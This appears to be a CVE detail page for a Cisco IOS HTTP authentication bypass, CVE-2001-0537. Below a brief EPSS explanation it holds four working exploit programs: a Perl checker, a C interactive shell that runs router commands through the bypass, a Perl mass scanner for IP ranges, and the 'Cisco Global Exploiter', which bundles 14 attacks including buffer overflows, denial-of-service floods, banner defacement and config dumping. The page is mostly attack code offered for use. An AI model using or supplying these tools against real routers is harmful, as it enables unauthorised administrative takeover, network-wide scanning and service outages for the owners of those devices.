CVE-2001-0537 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

# source: https://www.securityfocus.com/bid/2936/info # # IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches. # # It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access. # # This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service. # #!/usr/bin/perl # modified roelof's uni.pl # to check cisco ios http auth bug # cronos <[email protected]> use Socket; print "enter IP (x.x.x.x): "; $host= <STDIN>; chop($host); $i=16; $port=80; $target = inet_aton($host); $flag=0; LINE: while ($i<100) { # ------------- Sendraw - thanx RFP [email protected] my @results=sendraw("GET /level/".$i."/exec/- HTTP/1.0\r\n\r\n"); foreach $line (@results){ $line=~ tr/A-Z/a-z/; if ($line =~ /http\/1\.0 401 unauthorized/) {$flag=1;} if ($line =~ /http\/1\.0 200 ok/) {$flag=0;} } if ($flag==1){print "Not Vulnerable with $i\n\r";} else {print "$line Vulnerable with $i\n\r"; last LINE; } $i++; sub sendraw { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); } } }

/* source: https://www.securityfocus.com/bid/2936/info IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches. It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access. This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service. */ /* Coded and backdored by Eliel C. Sardanons <[email protected]> * to compile: * bash# gcc -o cisco cisco.c */ #include <stdio.h> #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #define HTTP_PORT 80 #define PROMPT "\ncisco$ " int usage (char *progname) { printf ("Usage:\n\t%s server\n", progname); exit(-1); } int main (int argc, char *argv[]) { struct hostent *he; struct sockaddr_in sin; int sck, i; char command[256], buffer[512]; if (argc < 2) usage(argv[0]); if ((he = gethostbyname(argv[1])) == NULL) { perror("host()"); exit(-1); } sin.sin_family = AF_INET; sin.sin_port = htons(HTTP_PORT); sin.sin_addr = *((struct in_addr *)he->h_addr); while (1) { if ((sck = socket (AF_INET, SOCK_STREAM, 6)) <= 0) { perror("socket()"); exit(-1); } if ((connect(sck, (struct sockaddr *)&sin, sizeof(sin))) < 0) { perror ("connect()"); exit(-1); } printf (PROMPT); fgets (command, 256, stdin); if (strlen(command) == 1) break; for (i=0;i<strlen(command);i++) { if (command[i] == ' ') command[i] = '/'; } snprintf (buffer, sizeof(buffer), "GET /level/16/exec/%s HTTP/1.0\r\n\r\n", command); write (sck, buffer, strlen(buffer)); memset (buffer, 0, sizeof(buffer)); while ((read (sck, buffer, sizeof(buffer))) != 0) { if ((strstr(buffer, "CR</A>")) != 0) { printf ("You need to complete the command with more parameters or finish the command with 'CR'\n"); memset (buffer, 0, sizeof(buffer)); break; } else if ((strstr(buffer, "Unauthorized")) != 0) { printf ("Server not vulnerable\n"); exit(-1); } else { printf ("%s", buffer); memset (buffer, 0, sizeof(buffer)); } } } printf ("Thanks...\n"); exit(0); }

# source: https://www.securityfocus.com/bid/2936/info # # IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches. # # It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access. # # This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service. # #!/usr/bin/perl # # Bulk Scanner for the Cisco IOS HTTP Configuration Arbitrary # Administrative Access Vulnerability # Found: 06-27-01 - Bugtraq ID: 2936 # Written by hypoclear on 07-03-01 # # usage: ./IOScan.pl <start ip> <end ip> # Note: start and end ip must be a Class B or C network # example: ./IOScan 192.168.0.0 192.168.255.255 # # hypoclear - [email protected] - http://hypoclear.cjb.net # This and all of my programs fall under my disclaimer, which # can be found at: http://hypoclear.cjb.net/hypodisclaim.txt use IO::Socket; die "\nusage: $0 <start ip> <end ip> Note: start and end ip must be a Class B or C network ex: ./IOScan 192.168.0.0 192.168.255.255\n\n" unless @ARGV > 0; $num = 16; $ipcount = 0; $vuln = 0; if (defined $ARGV[1]) { $currentIP = $ARGV[0]; $endIP = $ARGV[1]; while(1) { @CURIP = split(/\./,$currentIP); if (($CURIP[2] > 255) && ($CURIP[3] > 255)) { scanEnd(); } print "Scanning $currentIP\n"; scan($currentIP); if ($currentIP eq $endIP) { scanEnd(); } if ($CURIP[3] < 255) { $CURIP[3]++; } else { $CURIP[2]++; $CURIP[3]=0; } $currentIP = ""; foreach $item (@CURIP) { $currentIP .= "$item."; } $currentIP =~ s/\.$//; $ipcount++; } } sub scan { while ($num <100) { $IP = $_[0]; sender("GET /level/$num/exec/- HTTP/1.0\n\n"); if ($webRecv =~ /200 ok/) { $vuln++; open(OUT,">>ios.out") || die "Can't write to file"; print OUT "$IP is Vulnerable\n"; close(OUT); $num = 101; } $num++; } $num = 16; } sub sender { $sendsock = IO::Socket::INET -> new(Proto => 'tcp', PeerAddr => $IP, PeerPort => 80, Type => SOCK_STREAM, Timeout => 1); unless($sendsock){die "Can't connect to $ARGV[0]"} $sendsock->autoflush(1); $sendsock -> send($_[0]); $webRecv = ""; while(<$sendsock>){$webRecv .= $_} $webRecv =~ s/\n//g; close $sendsock; } sub scanEnd { print "\nScanned $ipcount ip addresses, $vuln addresses found vulnerable.\n"; if ($vuln > 0) {print "Check ios.out for vulnerable addresses.";} die "\n"; }

# source: https://www.securityfocus.com/bid/2936/info # # IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches. # # It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access. # # This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service. # #!/usr/bin/perl ## # Cisco Global Exploiter # # Legal notes : # The BlackAngels staff refuse all responsabilities # for an incorrect or illegal use of this software # or for eventual damages to others systems. # # http://www.blackangels.it ## ## # Modules ## use Socket; use IO::Socket; ## # Main ## $host = ""; $expvuln = ""; $host = @ARGV[ 0 ]; $expvuln = @ARGV[ 1 ]; if ($host eq "") { usage(); } if ($expvuln eq "") { usage(); } if ($expvuln eq "1") { cisco1(); } elsif ($expvuln eq "2") { cisco2(); } elsif ($expvuln eq "3") { cisco3(); } elsif ($expvuln eq "4") { cisco4(); } elsif ($expvuln eq "5") { cisco5(); } elsif ($expvuln eq "6") { cisco6(); } elsif ($expvuln eq "7") { cisco7(); } elsif ($expvuln eq "8") { cisco8(); } elsif ($expvuln eq "9") { cisco9(); } elsif ($expvuln eq "10") { cisco10(); } elsif ($expvuln eq "11") { cisco11(); } elsif ($expvuln eq "12") { cisco12(); } elsif ($expvuln eq "13") { cisco13(); } elsif ($expvuln eq "14") { cisco14(); } else { printf "\nInvalid vulnerability number ...\n\n"; exit(1); } ## # Functions ## sub usage { printf "\nUsage :\n"; printf "perl cge.pl <target> <vulnerability number>\n\n"; printf "Vulnerabilities list :\n"; printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability\n"; printf "[2] - Cisco IOS Router Denial of Service Vulnerability\n"; printf "[3] - Cisco IOS HTTP Auth Vulnerability\n"; printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability\n"; printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\n"; printf "[6] - Cisco 675 Web Administration Denial of Service Vulnerability\n"; printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\n"; printf "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\n"; printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerability\n"; printf "[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\n"; printf "[11] - Cisco Catalyst Memory Leak Vulnerability\n"; printf "[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability\n"; printf "[13] - %u Encoding IDS Bypass Vulnerability (UTF)\n"; printf "[14] - Cisco IOS HTTP Denial of Service Vulnerability\n"; exit(1); } sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability { my $serv = $host; my $dch = "?????????????????a~ %%%%%XX%%%%%"; my $num = 30000; my $string .= $dch x $num; my $shc="\015\012"; my $sockd = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $serv, PeerPort => "(23)", ) || die("No telnet server detected on $serv ...\n\n"); $sockd->autoflush(1); print $sockd "$string". $shc; while (<$sockd>){ print } print("\nPacket sent ...\n"); sleep(1); print("Now checking server's status ...\n"); sleep(2); my $sockd2 = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $serv, PeerPort => "(23)", ) || die("Vulnerability successful exploited. Target server is down ...\n\n"); print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); close($sockd2); exit(1); } sub cisco2 # Cisco IOS Router Denial of Service Vulnerability { my $serv = $host; my $sockd = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd){die "No http server detected on $serv ...\n\n"}; $sockd->autoflush(1); print $sockd "GET /\%\% HTTP/1.0\n\n"; -close $sockd; print "Packet sent ...\n"; sleep(1); print("Now checking server's status ...\n"); sleep(2); my $sockd2 = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); close($sockd2); exit(1); } sub cisco3 # Cisco IOS HTTP Auth Vulnerability { my $serv= $host; my $n=16; my $port=80; my $target = inet_aton($serv); my $fg = 0; LAB: while ($n<100) { my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n"); $n++; foreach $line (@results){ $line=~ tr/A-Z/a-z/; if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;} if ($line =~ /http\/1\.0 200 ok/) {$fg=0;} } if ($fg==1) { sleep(2); print "Vulnerability unsuccessful exploited ...\n\n"; } else { sleep(2); print "\nVulnerability successful exploited with [http://$serv/level/$n/exec/....] ...\n\n"; last LAB; } sub exploit { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Unable to initialize socket ...\n\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("No http server detected on $serv ...\n\n"); } } } exit(1); } sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability { my $serv = $host; my $n = 16; while ($n <100) { exploit1("GET /level/$n/exec/- HTTP/1.0\n\n"); $wr =~ s/\n//g; if ($wr =~ /200 ok/) { while(1) { print "\nVulnerability could be successful exploited. Please choose a type of attack :\n"; print "[1] Banner change\n"; print "[2] List vty 0 4 acl info\n"; print "[3] Other\n"; print "Enter a valid option [ 1 - 2 - 3 ] : "; $vuln = <STDIN>; chomp($vuln); if ($vuln == 1) { print "\nEnter deface line : "; $vuln = <STDIN>; chomp($vuln); exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0\n\n"); } elsif ($vuln == 2) { exploit1("GET /level/$n/exec/show%20conf HTTP/1.0\n\n"); print "$wrf"; } elsif ($vuln == 3) { print "\nEnter attack URL : "; $vuln = <STDIN>; chomp($vuln); exploit1("GET /$vuln HTTP/1.0\n\n"); print "$wrf"; } } } $wr = ""; $n++; } die "Vulnerability unsuccessful exploited ...\n\n"; sub exploit1 { my $sockd = IO::Socket::INET -> new ( Proto => 'tcp', PeerAddr => $serv, PeerPort => 80, Type => SOCK_STREAM, Timeout => 5); unless($sockd){die "No http server detected on $serv ...\n\n"} $sockd->autoflush(1); $sockd -> send($_[0]); while(<$sockd>){$wr .= $_} $wrf = $wr; close $sockd; } exit(1); } sub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability { my $serv = $host; my $port = 22; my $vuln = "a%a%a%a%a%a%a%"; my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => $port, Proto => "tcp") || die "No ssh server detected on $serv ...\n\n"; print "Packet sent ...\n"; print $sockd "$vuln"; close($sockd); exit(1); } sub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability { my $serv = $host; my $port = 80; my $vuln = "GET ? HTTP/1.0\n\n"; my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => $port, Proto => "tcp") || die "No http server detected on $serv ...\n\n"; print "Packet sent ...\n"; print $sockd "$vuln"; sleep(2); print "\nServer response :\n\n"; close($sockd); exit(1); } sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability { my $serv = $host; my $port = 80; my $k = ""; print "Enter a file to read [ /show/config/cr set as default ] : "; $k = <STDIN>; chomp ($k); if ($k eq "") {$vuln = "GET /exec/show/config/cr HTTP/1.0\n\n";} else {$vuln = "GET /exec$k HTTP/1.0\n\n";} my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => $port, Proto => "tcp") || die "No http server detected on $serv ...\n\n"; print "Packet sent ...\n"; print $sockd "$vuln"; sleep(2); print "\nServer response :\n\n"; while (<$sockd>){print} close($sockd); exit(1); } sub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability { my $serv = $host; my $port = 80; my $vuln = "GET /error?/ HTTP/1.0\n\n"; my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => $port, Proto => "tcp") || die "No http server detected on $serv ...\n\n"; print "Packet sent ...\n"; print $sockd "$vuln"; sleep(2); print "\nServer response :\n\n"; while (<$sockd>){print} close($sockd); exit(1); } sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability { my $ip = $host; my $port = "514"; my $ports = ""; my $size = ""; my $i = ""; my $string = "%%%%%XX%%%%%"; print "Input packets size : "; $size = <STDIN>; chomp($size); socket(SS, PF_INET, SOCK_DGRAM, 17); my $iaddr = inet_aton("$ip"); for ($i=0; $i<10000; $i++) { send(SS, $string, $size, sockaddr_in($port, $iaddr)); } printf "\nPackets sent ...\n"; sleep(2); printf "Please enter a server's open port : "; $ports = <STDIN>; chomp $ports; printf "\nNow checking server status ...\n"; sleep(2); socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...\n\n"; my $dest = sockaddr_in ($ports, inet_aton($ip)); connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n"; printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n"; exit(1); } sub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability { my $ip = $host; my $vln = "%%%%%XX%%%%%"; my $num = 30000; my $string .= $vln x $num; my $shc="\015\012"; my $sockd = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $ip, PeerPort => "(2002)", ) || die "Unable to connect to $ip:2002 ...\n\n"; $sockd->autoflush(1); print $sockd "$string" . $shc; while (<$sockd>){ print } print "Packet sent ...\n"; close($sockd); sleep(1); print("Now checking server's status ...\n"); sleep(2); my $sockd2 = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$ip, PeerPort=>"(2002)",); unless ($sockd){die "Vulnerability successful exploited. Target server is down ...\n\n"}; print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); exit(1); } sub cisco11 # Cisco Catalyst Memory Leak Vulnerability { my $serv = $host; my $rep = ""; my $str = "AAA\n"; print "\nInput the number of repetitions : "; $rep = <STDIN>; chomp $rep; my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => "(23)", Proto => "tcp") || die "No telnet server detected on $serv ...\n\n"; for ($k=0; $k<=$rep; $k++) { print $sockd "$str"; sleep(1); print $sockd "$str"; sleep(1); } close($sockd); print "Packet sent ...\n"; sleep(1); print("Now checking server's status ...\n"); sleep(2); my $sockd2 = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"(23)",); unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; print "Vulnerability unsuccessful exploited. Target server is still up after $rep logins ...\\n"; close($sockd2); exit(1); } sub cisco12 # Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability { my $serv = $host; my $l =100; my $vuln = ""; my $long = "A" x $l; my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => "(80)", Proto => "tcp") || die "No http server detected on $serv ...\n\n"; for ($k=0; $k<=50; $k++) { my $vuln = "GET " . $long . " HTTP/1.0\n\n"; print $sockd "$vuln\n\n"; sleep(1); $l = $l + 100; } close($sockd); print "Packet sent ...\n"; sleep(1); print("Now checking server's status ...\n"); sleep(2); my $sockd2 = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; print "Target is not vulnerable. Server is still up after 5 kb of buffer ...)\n"; close($sockd2); exit(1); } sub cisco13 # %u Encoding IDS Bypass Vulnerability (UTF) { my $serv = $host; my $vuln = "GET %u002F HTTP/1.0\n\n"; my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => "(80)", Proto => "tcp") || die "No http server detected on $serv ...\n\n"; print "Packet sent ...\n"; print $sockd "$vuln"; close($sockd); sleep(1); print("Now checking server's status ...\n"); print("Please verify if directory has been listed ...\n\n"); print("Server response :\n"); sleep(2); while (<$sockd>){ print } exit(1); } sub cisco14 # Cisco IOS HTTP server DoS Vulnerability { my $serv = $host; my $vuln = "GET /TEST?/ HTTP/1.0"; my $sockd = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd){die "No http server detected on $serv ...\n\n"}; print $sockd "$vuln\n\n"; print "Packet sent ...\n"; close($sockd); sleep(1); print("Now checking server's status ...\n"); sleep(2); my $sockd2 = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); close($sockd2); exit(1); }